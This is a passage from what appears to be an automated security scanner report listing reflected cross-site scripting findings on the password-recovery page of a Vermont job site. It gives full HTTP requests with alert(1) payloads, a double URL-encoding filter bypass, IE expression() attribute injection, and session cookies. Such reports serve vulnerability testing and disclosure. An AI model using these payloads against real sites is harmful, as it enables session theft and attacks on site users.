GET /ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&FormID=47&rand=340991&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&usvuserid_adadefault_error=&securitysys=on&formname_error=Form0&choice_error=2&cftextboxextradonotuse=&errorfields=usvuserid&cftextboxextradonotuse_error=&formname=Form0799ac"style%3d"x%3aexpression(alert(1))"4abc07c70f3b31178&usvuserid_error=&choice=2&submit_error=Continue&bltextboxextradonotuse1_error=&u_name_error=yes&bltextboxextradonotuse1=&formid=10&old_choice=2&rand=1902&old_choice_error=2&cftextboxextradonotuse=&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A38%27%7D&FormName=Form0 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=14&rand=662813
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:24 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<input type="hidden" name="FORMNAME_prev" value="Form0799ac"style="x:expression(alert(1))"4abc07c70f3b31178,Form0" />
...[SNIP]...

3.142. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [library_errormessage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the library_errormessage request parameter is copied into the HTML document as plain text between tags. The payload fa763%253cscript%253ealert%25281%2529%253c%252fscript%253e0885d9cb6b2590cc1 was submitted in the library_errormessage parameter. This input was echoed as fa763<script>alert(1)</script>0885d9cb6b2590cc1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520fa763%253cscript%253ealert%25281%2529%253c%252fscript%253e0885d9cb6b2590cc1&old_choice=2&bltextboxextradonotuse1_error=&u_name_error=yes&cftextboxextradonotuse_error=&usvuserid_adadefault_error=&old_choice_error=2&usvuserid_error=&submit_error=Continue&CHOICE=2&formname_error=Form0&choice_error=2&ERRORFIELDS=usvuserid&cftextboxextradonotuse=&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A32%27%7D&FormName=Form0 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:52 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
</li> fa763<script>alert(1)</script>0885d9cb6b2590cc1 </ul>
...[SNIP]...

3.143. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [library_errormessage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the library_errormessage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ccda"style%3d"x%3aexpression(alert(1))"396e9a22eeb45e270 was submitted in the library_errormessage parameter. This input was echoed as 8ccda"style="x:expression(alert(1))"396e9a22eeb45e270 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%25208ccda"style%3d"x%3aexpression(alert(1))"396e9a22eeb45e270&old_choice=2&bltextboxextradonotuse1_error=&u_name_error=yes&cftextboxextradonotuse_error=&usvuserid_adadefault_error=&old_choice_error=2&usvuserid_error=&submit_error=Continue&CHOICE=2&formname_error=Form0&choice_error=2&ERRORFIELDS=usvuserid&cftextboxextradonotuse=&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A32%27%7D&FormName=Form0 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:50 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<input type="hidden" name="LIBRARY_ERRORMESSAGE_prev" value="%20%3Cli%3EPlease%20fill%20out%20the%20username%20field%2E%3C%2Fli%3E%3C%2Fli%3E%208ccda"style="x:expression(alert(1))"396e9a22eeb45e270" />
...[SNIP]...

3.144. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [old_choice parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the old_choice request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b86e"style%3d"x%3aexpression(alert(1))"aca403b3b was submitted in the old_choice parameter. This input was echoed as 8b86e"style="x:expression(alert(1))"aca403b3b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

POST /ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Content-Length: 283

usvuserid=&usvuserid_ADAdefault=&usvuserid_req=Please+fill+out+the+username+field.&usvuserid_verify_char%5B0%7C20%5D=The+value+you+have+supplied+for+Username+is+too+long.&submit=Continue&old_choice=28b86e"style%3d"x%3aexpression(alert(1))"aca403b3b&U_name=yes&choice=2&cftextboxextradonotuse=&bltextboxextradonotuse1=&FormName=Form0

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:29 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:08:29'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{
...[SNIP]...
<input type="hidden" name="old_choice_error" value="28b86e"style="x:expression(alert(1))"aca403b3b" class="cfTransparent" />
...[SNIP]...

3.145. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [old_choice parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the old_choice request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67674"style%3d"x%3aexpression(alert(1))"47dcb2bfae6b18167 was submitted in the old_choice parameter. This input was echoed as 67674"style="x:expression(alert(1))"47dcb2bfae6b18167 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=267674"style%3d"x%3aexpression(alert(1))"47dcb2bfae6b18167&bltextboxextradonotuse1_error=&u_name_error=yes&cftextboxextradonotuse_error=&usvuserid_adadefault_error=&old_choice_error=2&usvuserid_error=&submit_error=Continue&CHOICE=2&formname_error=Form0&choice_error=2&ERRORFIELDS=usvuserid&cftextboxextradonotuse=&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A32%27%7D&FormName=Form0 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:55 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<input type="hidden" name="OLD_CHOICE_prev" value="267674"style="x:expression(alert(1))"47dcb2bfae6b18167" />
...[SNIP]...

3.146. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [rand parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the rand request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49ec8"style%3d"x%3aexpression(alert(1))"4a6109f7622c7b188 was submitted in the rand parameter. This input was echoed as 49ec8"style="x:expression(alert(1))"4a6109f7622c7b188 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&FormID=47&rand=340991&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&usvuserid_adadefault_error=&securitysys=on&formname_error=Form0&choice_error=2&cftextboxextradonotuse=&errorfields=usvuserid&cftextboxextradonotuse_error=&formname=Form0&usvuserid_error=&choice=2&submit_error=Continue&bltextboxextradonotuse1_error=&u_name_error=yes&bltextboxextradonotuse1=&formid=10&old_choice=2&rand=190249ec8"style%3d"x%3aexpression(alert(1))"4a6109f7622c7b188&old_choice_error=2&cftextboxextradonotuse=&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A38%27%7D&FormName=Form0 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=14&rand=662813
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:33 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<input type="hidden" name="RAND_prev" value="340991,190249ec8"style="x:expression(alert(1))"4a6109f7622c7b188" />
...[SNIP]...

3.147. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [rand parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the rand request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c93e5"><a>3041bdbfc36 was submitted in the rand parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&FormID=47&rand=340991c93e5"><a>3041bdbfc36 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=14&rand=662813
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Content-Length: 611

library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&usvuserid_adadefault_error=&securitysys=on&formnam
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:00 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
